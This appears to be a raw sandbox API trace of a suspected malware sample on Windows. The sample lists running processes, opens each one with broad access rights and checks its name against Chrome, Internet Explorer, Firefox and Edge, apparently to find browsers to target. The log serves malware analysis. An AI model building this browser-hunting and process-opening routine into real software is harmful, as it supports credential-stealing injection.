	[0202.378] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0202.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2230
	[0202.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.379] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0202.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.379] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.380] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0202.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.380] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.380] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0202.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2234
	[0202.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.381] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.381] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.381] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.382] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.382] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0202.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2238
	[0202.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.383] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0202.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.383] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.383] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0202.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.384] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.384] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0202.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x223c
	[0202.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.385] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0202.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.385] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.385] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0202.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.386] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.386] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0202.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2240
	[0202.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.387] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0202.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.387] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.387] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0202.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.388] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.388] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0202.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2244
	[0202.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.389] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0202.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.389] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.389] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0202.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.389] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.390] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2248
	[0202.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.390] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.391] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.391] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.391] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.391] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x224c
	[0202.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.392] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.393] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.393] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.393] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.393] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2250
	[0202.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.394] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.395] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.395] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.395] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.395] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2254
	[0202.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.396] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.397] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.397] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.397] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.397] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.398] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2258
	[0202.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.398] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.398] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.399] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.399] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.399] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.400] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x225c
	[0202.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.400] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.400] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.401] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.401] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.401] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.402] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2260
	[0202.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.402] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.402] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.403] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.403] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.403] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0202.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2264
	[0202.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.404] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0202.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.404] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.405] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0202.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.405] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.405] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.406] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2268
	[0202.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.406] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.406] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.407] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.407] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.407] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0202.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x226c
	[0202.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.408] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.408] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.409] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.409] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.409] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2270
	[0202.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.410] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.410] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.414] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.414] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.414] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2274
	[0202.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.415] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.416] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.416] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.416] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.416] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0202.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2278
	[0202.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.417] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0202.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.418] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.418] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0202.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.418] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.419] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0202.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x227c
	[0202.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.419] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0202.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.420] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.420] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0202.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.420] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.420] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0202.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2280
	[0202.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.421] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0202.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.422] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.422] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0202.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.422] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.422] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0202.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2284
	[0202.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.423] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0202.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.423] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.424] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0202.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.424] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.424] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0202.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0202.425] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0202.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2288
	[0202.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.426] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0202.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.427] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.427] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0202.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.428] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.428] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0202.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x228c
	[0202.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.429] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0202.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.429] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.430] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0202.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.430] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.430] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0202.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2290
	[0202.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.431] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0202.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
